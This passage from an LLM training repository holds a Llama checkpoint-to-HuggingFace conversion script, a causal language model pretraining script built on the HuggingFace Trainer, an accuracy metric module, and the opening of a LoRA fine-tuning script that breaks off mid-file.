= [ torch.load(os.path.join(input_base_path, f"consolidated.{i:02d}.pth"), map_location="cpu") for i in range(num_shards) ] param_count = 0 index_dict = {"weight_map": {}} for layer_i in range(n_layers): filename = f"pytorch_model-{layer_i + 1}-of-{n_layers + 1}.bin" if model_size == "7B": # Unsharded state_dict = { f"model.layers.{layer_i}.self_attn.q_proj.weight": permute( loaded[f"layers.{layer_i}.attention.wq.weight"] ), f"model.layers.{layer_i}.self_attn.k_proj.weight": permute( loaded[f"layers.{layer_i}.attention.wk.weight"] ), f"model.layers.{layer_i}.self_attn.v_proj.weight": loaded[f"layers.{layer_i}.attention.wv.weight"], f"model.layers.{layer_i}.self_attn.o_proj.weight": loaded[f"layers.{layer_i}.attention.wo.weight"], f"model.layers.{layer_i}.mlp.gate_proj.weight": loaded[f"layers.{layer_i}.feed_forward.w1.weight"], f"model.layers.{layer_i}.mlp.down_proj.weight": loaded[f"layers.{layer_i}.feed_forward.w2.weight"], f"model.layers.{layer_i}.mlp.up_proj.weight": loaded[f"layers.{layer_i}.feed_forward.w3.weight"], f"model.layers.{layer_i}.input_layernorm.weight": loaded[f"layers.{layer_i}.attention_norm.weight"], f"model.layers.{layer_i}.post_attention_layernorm.weight": loaded[f"layers.{layer_i}.ffn_norm.weight"], } else: # Sharded # Note that attention.w{q,k,v,o}, feed_fordward.w[1,2,3], attention_norm.weight and ffn_norm.weight share # the same storage object, saving attention_norm and ffn_norm will save other weights too, which is # redundant as other weights will be stitched from multiple shards. To avoid that, they are cloned. state_dict = { f"model.layers.{layer_i}.input_layernorm.weight": loaded[0][ f"layers.{layer_i}.attention_norm.weight" ].clone(), f"model.layers.{layer_i}.post_attention_layernorm.weight": loaded[0][ f"layers.{layer_i}.ffn_norm.weight" ].clone(), } state_dict[f"model.layers.{layer_i}.self_attn.q_proj.weight"] = permute( torch.cat( [ loaded[i][f"layers.{layer_i}.attention.wq.weight"].view(n_heads_per_shard, dims_per_head, dim) for i in range(num_shards) ], dim=0, ).reshape(dim, dim) ) state_dict[f"model.layers.{layer_i}.self_attn.k_proj.weight"] = permute( torch.cat( [ loaded[i][f"layers.{layer_i}.attention.wk.weight"].view( num_local_key_value_heads, dims_per_head, dim ) for i in range(num_shards) ], dim=0, ).reshape(key_value_dim, dim), num_key_value_heads, key_value_dim, dim, ) state_dict[f"model.layers.{layer_i}.self_attn.v_proj.weight"] = torch.cat( [ loaded[i][f"layers.{layer_i}.attention.wv.weight"].view( num_local_key_value_heads, dims_per_head, dim ) for i in range(num_shards) ], dim=0, ).reshape(key_value_dim, dim) state_dict[f"model.layers.{layer_i}.self_attn.o_proj.weight"] = torch.cat( [loaded[i][f"layers.{layer_i}.attention.wo.weight"] for i in range(num_shards)], dim=1 ) state_dict[f"model.layers.{layer_i}.mlp.gate_proj.weight"] = torch.cat( [loaded[i][f"layers.{layer_i}.feed_forward.w1.weight"] for i in range(num_shards)], dim=0 ) state_dict[f"model.layers.{layer_i}.mlp.down_proj.weight"] = torch.cat( [loaded[i][f"layers.{layer_i}.feed_forward.w2.weight"] for i in range(num_shards)], dim=1 ) state_dict[f"model.layers.{layer_i}.mlp.up_proj.weight"] = torch.cat( [loaded[i][f"layers.{layer_i}.feed_forward.w3.weight"] for i in range(num_shards)], dim=0 ) state_dict[f"model.layers.{layer_i}.self_attn.rotary_emb.inv_freq"] = inv_freq for k, v in state_dict.items(): index_dict["weight_map"][k] = filename param_count += v.numel() torch.save(state_dict, os.path.join(tmp_model_path, filename)) filename = f"pytorch_model-{n_layers + 1}-of-{n_layers + 1}.bin" if model_size == "7B": # Unsharded state_dict = { "model.embed_tokens.weight": loaded["tok_embeddings.weight"], "model.norm.weight": loaded["norm.weight"], "lm_head.weight": loaded["output.weight"], } else: state_dict = { "model.norm.weight": loaded[0]["norm.weight"], "model.embed_tokens.weight": torch.cat( [loaded[i]["tok_embeddings.weight"] for i in range(num_shards)], dim=1 ), "lm_head.weight": torch.cat([loaded[i]["output.weight"] for i in range(num_shards)], dim=0), } for k, v in state_dict.items(): index_dict["weight_map"][k] = filename param_count += v.numel() torch.save(state_dict, os.path.join(tmp_model_path, filename)) # Write configs index_dict["metadata"] = {"total_size": param_count * 2} write_json(index_dict, os.path.join(tmp_model_path, "pytorch_model.bin.index.json")) ffn_dim_multiplier = params["ffn_dim_multiplier"] if "ffn_dim_multiplier" in params else 1 multiple_of = params["multiple_of"] if "multiple_of" in params else 256 config = LlamaConfig( hidden_size=dim, intermediate_size=compute_intermediate_size(dim, ffn_dim_multiplier, multiple_of), num_attention_heads=params["n_heads"], num_hidden_layers=params["n_layers"], rms_norm_eps=params["norm_eps"], num_key_value_heads=num_key_value_heads, ) config.save_pretrained(tmp_model_path) # Make space so we can load the model properly now. del state_dict del loaded gc.collect() print("Loading the checkpoint in a Llama model.") model = LlamaForCausalLM.from_pretrained(tmp_model_path, torch_dtype=torch.float16, low_cpu_mem_usage=True) # Avoid saving this as part of the config. del model.config._name_or_path print("Saving in the Transformers format.") model.save_pretrained(model_path, safe_serialization=safe_serialization) shutil.rmtree(tmp_model_path) def write_tokenizer(tokenizer_path, input_tokenizer_path): # Initialize the tokenizer based on the `spm` model tokenizer_class = LlamaTokenizer if LlamaTokenizerFast is None else LlamaTokenizerFast print(f"Saving a {tokenizer_class.__name__} to {tokenizer_path}.") tokenizer = tokenizer_class(input_tokenizer_path) tokenizer.save_pretrained(tokenizer_path) def main(): parser = argparse.ArgumentParser() parser.add_argument( "--input_dir", help="Location of LLaMA weights, which contains tokenizer.model and model folders", ) parser.add_argument( "--model_size", choices=["7B", "7Bf", "13B", "13Bf", "30B", "65B", "70B", "70Bf", "tokenizer_only"], help="'f' models correspond to the finetuned versions, and are specific to the Llama2 official release. For more details on Llama2, checkout the original repo: https://huggingface.co/meta-llama", ) parser.add_argument( "--output_dir", help="Location to write HF model and tokenizer", ) parser.add_argument("--safe_serialization", type=bool, help="Whether or not to save using `safetensors`.") args = parser.parse_args() if args.model_size != "tokenizer_only": write_model( model_path=args.output_dir, # input_base_path=os.path.join(args.input_dir, args.model_size), input_base_path=args.input_dir, model_size=args.model_size, safe_serialization=args.safe_serialization, ) spm_path = os.path.join(args.input_dir, "tokenizer.model") write_tokenizer(args.output_dir, spm_path) if __name__ == "__main__": main() File: train/pretrain/pretrain_clm.py #!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=text-generation """ # You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments. import logging import math import os import sys from dataclasses import dataclass, field from torchdata.datapipes.iter import IterDataPipe, IterableWrapper from itertools import chain import deepspeed from typing import Optional,List import datasets import pandas as pd import evaluate import torch from datasets import load_dataset from datasets.combine import interleave_datasets import transformers from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR from transformers import ( CONFIG_MAPPING, MODEL_FOR_CAUSAL_LM_MAPPING, AutoConfig, AutoModelForCausalLM, AutoTokenizer, TrainerCallback, TrainerState, TrainerControl, HfArgumentParser, Trainer, TrainingArguments, default_data_collator, is_torch_tpu_available, set_seed, ) import datetime from transformers.testing_utils import CaptureLogger from transformers.trainer_utils import get_last_checkpoint from transformers.utils import check_min_version, send_example_telemetry from transformers.utils.versions import require_version from datasets import interleave_datasets # Will error if the minimal version of Transformers is not installed. Remove at your own risks. # check_min_version("4.27.0.dev0") require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt") logger = logging.getLogger(__name__) MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch." ) }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": ( "Override some existing default config settings when a model is trained from scratch. Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" ) }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": ( "Will use the token generated when running `huggingface-cli login` (necessary to use this script " "with private models)." ) }, ) torch_dtype: Optional[str] = field( default=None, metadata={ "help": ( "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the " "dtype will be automatically derived from the model's weights." ), "choices": ["auto", "bfloat16", "float16", "float32"], }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ dataset_name: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) dataset_config_name: Optional[str] = field( default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."} ) train_files: Optional[List[str]] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_files: Optional[List[str]] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of training examples to this " "value if set." ) }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of evaluation examples to this " "value if set." ) }, ) streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"}) block_size: Optional[int] = field( default=None, metadata={ "help": ( "Optional input sequence length after tokenization. " "The training dataset will be truncated in block of this size for training. " "Default to the model max input length for single sentence inputs (take into account special tokens)." ) }, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[int] = field( default=5, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) keep_linebreaks: bool = field( default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."} ) def __post_init__(self): if self.streaming: require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`") if self.dataset_name is None and self.train_files is None and self.validation_files is None: raise ValueError("Need either a dataset name or a training/validation file.") else: if self.train_files is not None: extension = self.train_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`train_file` should be a csv, a json or a txt file." if self.validation_files is not None: extension = self.validation_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`validation_file` should be a csv, a json or a txt file." def main(): # See all possible arguments in src/transformers/training_args.py # or by passing the --help flag to this script. # We now keep distinct sets of args, for a cleaner separation of concerns. parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The # information sent is the one passed as arguments along with your Python/PyTorch versions. send_example_telemetry("run_clm", model_args, data_args) # Setup logging logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", handlers=[logging.StreamHandler(sys.stdout)], ) if training_args.should_log: # The default of training_args.log_level is passive, so we set log level at info here to have that default. transformers.utils.logging.set_verbosity_info() log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) logger.info(f"Training/evaluation parameters {training_args}") # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. " "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. set_seed(training_args.seed) # Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below) # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/ # (the dataset will be downloaded automatically from the datasets Hub). # # For CSV/JSON files, this script will use the column called 'text' or the first column if no column called # 'text' is found. You can easily tweak this behavior (see below). # # In distributed training, the load_dataset function guarantee that only one local process can concurrently # download the dataset. if True: data_files = {} dataset_args = {} if data_args.train_files is not None: print(data_args.train_files) data_files["train"] = data_args.train_files print('训练文件总个数',len(data_args.train_files)) if data_args.validation_files is not None: data_files["validation"] = data_args.validation_files extension = ( data_files["train"][0].split(".")[-1] if data_files["train"] is not None else data_args.validation_files.split(".")[-1] ) if extension == "txt": extension = "text" dataset_args["keep_linebreaks"] = data_args.keep_linebreaks raw_datasets = load_dataset( extension, data_files=data_files, streaming=data_args.streaming, cache_dir=os.path.join(training_args.output_dir,'dataset_cache'), use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) if data_args.streaming: raw_datasets = raw_datasets.shuffle(seed=training_args.seed, buffer_size=1000000) # If no validation data is there, validation_split_percentage will be used to divide the dataset. if "validation" not in raw_datasets.keys(): raw_datasets["validation"] = load_dataset( extension, data_files=data_files, split=f"train[:{data_args.validation_split_percentage}%]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) raw_datasets["train"] = load_dataset( extension, data_files=data_files, split=f"train[{data_args.validation_split_percentage}%:]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at # https://huggingface.co/docs/datasets/loading_datasets.html. # Load pretrained model and tokenizer # # Distributed training: # The .from_pretrained methods guarantee that only one local process can concurrently # download model & vocab. config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) logger.info(f"New config: {config}") print(training_args.local_rank,'start load tokenizer') tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.model_name_or_path: tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." ) print(training_args.local_rank,'end load tokenizer') print(training_args.local_rank,'start load model') if model_args.model_name_or_path: torch_dtype = ( model_args.torch_dtype if model_args.torch_dtype in ["auto", None] else getattr(torch, model_args.torch_dtype) ) model = AutoModelForCausalLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, trust_remote_code=True, use_flash_attention_2=True, use_auth_token=True if model_args.use_auth_token else None, ) else: model = AutoModelForCausalLM.from_config(config,trust_remote_code=True) n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values()) logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params") print(training_args.local_rank,'end load model') # We resize the embeddings only when necessary to avoid index errors. If you are creating a model from scratch # on a small vocab and want a smaller embedding size, remove this test. embedding_size = model.get_input_embeddings().weight.shape[0] if len(tokenizer) > embedding_size: model.resize_token_embeddings(len(tokenizer)) # Preprocessing the datasets. # First we tokenize all the texts. if training_args.do_train: if data_args.streaming: dataset_head = raw_datasets["train"].take(3) print(list(dataset_head)) column_names = list(list(dataset_head)[0].keys()) else: column_names = list(raw_datasets["train"].features) else: if data_args.streaming: dataset_head = raw_datasets["validation"].take(3) column_names = list(list(dataset_head)[0].keys()) else: column_names = list(raw_datasets["validation"].features) print(column_names) text_column_name = "text" if "text" in column_names else column_names[0] # since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base") def tokenize_function(examples): with CaptureLogger(tok_logger) as cl: output = tokenizer( [ item for item in examples[text_column_name]]) return output with training_args.main_process_first(desc="dataset map tokenization"): if not data_args.streaming: tokenized_datasets = raw_datasets.map( tokenize_function, batched=True, num_proc=data_args.preprocessing_num_workers, remove_columns=column_names, load_from_cache_file=not data_args.overwrite_cache, desc="Running tokenizer on dataset", ) else: tokenized_datasets = raw_datasets.map( tokenize_function, batched=True, remove_columns=column_names, batch_size = 60000, ) if data_args.block_size is None: block_size = tokenizer.model_max_length if block_size > 1024: logger.warning( "The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value" " of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can" " override this default with `--block_size xxx`." ) block_size = 1024 else: if data_args.block_size > tokenizer.model_max_length: logger.warning( f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model" f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}." ) block_size = min(data_args.block_size, tokenizer.model_max_length) # Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size. def group_texts(examples): # Concatenate all texts. concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()} # concatenated_examples = {k: sum(examples[k], []) for k in examples.keys()} total_length = len(concatenated_examples[list(examples.keys())[0]]) # We drop the small remainder, we could add padding if the model supported it instead of this drop, you can # customize this part to your needs. if total_length >= block_size: total_length = (total_length // block_size) * block_size # Split by chunks of max_len. result = { k: [t[i : i + block_size] for i in range(0, total_length, block_size)] for k, t in concatenated_examples.items() } # print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')) logger.info("group texts input examples length%d after_group size%d"%(len(examples['input_ids']),len(result["input_ids"]))) result["labels"] = result["input_ids"].copy() return result # Note that with `batched=True`, this map processes 1,000 texts together, so group_texts throws away a remainder # for each of those groups of 1,000 texts. You can adjust that batch_size here but a higher value might be slower # to preprocess. # # To speed up this part, we use multiprocessing. See the documentation of the map method for more information: # https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.map with training_args.main_process_first(desc="grouping texts together"): if not data_args.streaming: lm_datasets = tokenized_datasets.map( group_texts, batched=True, num_proc=data_args.preprocessing_num_workers, load_from_cache_file=not data_args.overwrite_cache, desc=f"Grouping texts in chunks of {block_size}", batch_size = 40000, ) else: lm_datasets = tokenized_datasets.map( group_texts, batched=True, batch_size = 60000, ) print(training_args.local_rank,'start select train_dataset') if training_args.do_train: if "train" not in tokenized_datasets: raise ValueError("--do_train requires a train dataset") train_dataset = lm_datasets["train"] if data_args.max_train_samples is not None and data_args.streaming==False: max_train_samples = min(len(train_dataset), data_args.max_train_samples) train_dataset = train_dataset.select(range(max_train_samples)) print(training_args.local_rank,'end select train_dataset') if training_args.do_eval: if "validation" not in tokenized_datasets: raise ValueError("--do_eval requires a validation dataset") print(training_args.local_rank,'start select eval_dataset') eval_dataset = lm_datasets["validation"] if data_args.max_eval_samples is not None and data_args.streaming==False : max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples) eval_dataset = eval_dataset.select(range(max_eval_samples)) print(training_args.local_rank,'end select eval_dataset') def preprocess_logits_for_metrics(logits, labels): if isinstance(logits, tuple): # Depending on the model and config, logits may contain extra tensors, # like past_key_values, but logits always come first logits = logits[0] return logits.argmax(dim=-1) print(training_args.local_rank,'start load metric') metric = evaluate.load("accuracy.py") print(training_args.local_rank,'end load metric') def compute_metrics(eval_preds): preds, labels = eval_preds # preds have the same shape as the labels, after the argmax(-1) has been calculated # by preprocess_logits_for_metrics but we need to shift the labels labels = labels[:, 1:].reshape(-1) preds = preds[:, :-1].reshape(-1) return metric.compute(predictions=preds, references=labels) print(training_args.local_rank,'Initialize our Trainer') trainer = Trainer( model=model, args=training_args, train_dataset= IterableWrapper(train_dataset) if training_args.do_train else None, eval_dataset= IterableWrapper(eval_dataset) if training_args.do_eval else None, tokenizer=tokenizer, # Data collator will default to DataCollatorWithPadding, so we change it. data_collator=default_data_collator, compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None, preprocess_logits_for_metrics=preprocess_logits_for_metrics if training_args.do_eval and not is_torch_tpu_available()else None, # callbacks=([SavePeftModelCallback] if isinstance(model, PeftModel) else None), ) if training_args.do_train: checkpoint = None if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint print(training_args.local_rank,'start train') train_result = trainer.train(resume_from_checkpoint=checkpoint) trainer.save_model() # Saves the tokenizer too for easy upload metrics = train_result.metrics max_train_samples = ( data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset) ) metrics["train_samples"] = min(max_train_samples, len(train_dataset)) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset) metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset)) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) def _mp_fn(index): # For xla_spawn (TPUs) main() if __name__ == "__main__": main() File: train/pretrain/accuracy.py # Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Accuracy metric.""" import datasets from sklearn.metrics import accuracy_score import evaluate _DESCRIPTION = """ Accuracy is the proportion of correct predictions among the total number of cases processed. It can be computed with: Accuracy = (TP + TN) / (TP + TN + FP + FN) Where: TP: True positive TN: True negative FP: False positive FN: False negative """ _KWARGS_DESCRIPTION = """ Args: predictions (`list` of `int`): Predicted labels. references (`list` of `int`): Ground truth labels. normalize (`boolean`): If set to False, returns the number of correctly classified samples. Otherwise, returns the fraction of correctly classified samples. Defaults to True. sample_weight (`list` of `float`): Sample weights Defaults to None. Returns: accuracy (`float` or `int`): Accuracy score. Minimum possible value is 0. Maximum possible value is 1.0, or the number of examples input, if `normalize` is set to `True`.. A higher score means higher accuracy. Examples: Example 1-A simple example >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0]) >>> print(results) {'accuracy': 0.5} Example 2-The same as Example 1, except with `normalize` set to `False`. >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0], normalize=False) >>> print(results) {'accuracy': 3.0} Example 3-The same as Example 1, except with `sample_weight` set. >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0], sample_weight=[0.5, 2, 0.7, 0.5, 9, 0.4]) >>> print(results) {'accuracy': 0.8778625954198473} """ _CITATION = """ @article{scikit-learn, title={Scikit-learn: Machine Learning in {P}ython}, author={Pedregosa, F. and Varoquaux, G. and Gramfort, A. and Michel, V. and Thirion, B. and Grisel, O. and Blondel, M. and Prettenhofer, P. and Weiss, R. and Dubourg, V. and Vanderplas, J. and Passos, A. and Cournapeau, D. and Brucher, M. and Perrot, M. and Duchesnay, E.}, journal={Journal of Machine Learning Research}, volume={12}, pages={2825--2830}, year={2011} } """ @evaluate.utils.file_utils.add_start_docstrings(_DESCRIPTION, _KWARGS_DESCRIPTION) class Accuracy(evaluate.Metric): def _info(self): return evaluate.MetricInfo( description=_DESCRIPTION, citation=_CITATION, inputs_description=_KWARGS_DESCRIPTION, features=datasets.Features( { "predictions": datasets.Sequence(datasets.Value("int32")), "references": datasets.Sequence(datasets.Value("int32")), } if self.config_name == "multilabel" else { "predictions": datasets.Value("int32"), "references": datasets.Value("int32"), } ), reference_urls=["https://scikit-learn.org/stable/modules/generated/sklearn.metrics.accuracy_score.html"], ) def _compute(self, predictions, references, normalize=True, sample_weight=None): return { "accuracy": float( accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight) ) } File: train/sft/finetune_clm.py #!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=text-generation """ # You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments. import logging import math import os import sys import random from dataclasses import dataclass, field from itertools import chain import deepspeed from typing import Optional,List,Union import datasets import evaluate import torch from datasets import load_dataset from peft import ( # noqa: E402 LoraConfig, PeftModel, get_peft_model, get_peft_model_state_dict, prepare_model_for_int8_training, prepare_model_for_kbit_training, set_peft_model_state_dict, ) import transformers from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR from transformers import ( CONFIG_MAPPING, MODEL_FOR_CAUSAL_LM_MAPPING, AutoConfig, AutoModelForCausalLM, AutoTokenizer, TrainerCallback, TrainerState, TrainerControl, HfArgumentParser, Trainer, TrainingArguments, default_data_collator, BitsAndBytesConfig, is_torch_tpu_available, set_seed, ) from transformers.testing_utils import CaptureLogger from transformers.trainer_utils import get_last_checkpoint from transformers.utils import check_min_version, send_example_telemetry from transformers.utils.versions import require_version import pdb # Will error if the minimal version of Transformers is not installed. Remove at your own risks. # check_min_version("4.27.0.dev0") require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt") logger = logging.getLogger(__name__) MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch." ) }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": ( "Override some existing default config settings when a model is trained from scratch. Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" ) }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": ( "Will use the token generated when running `huggingface-cli login` (necessary to use this script " "with private models)." ) }, ) torch_dtype: 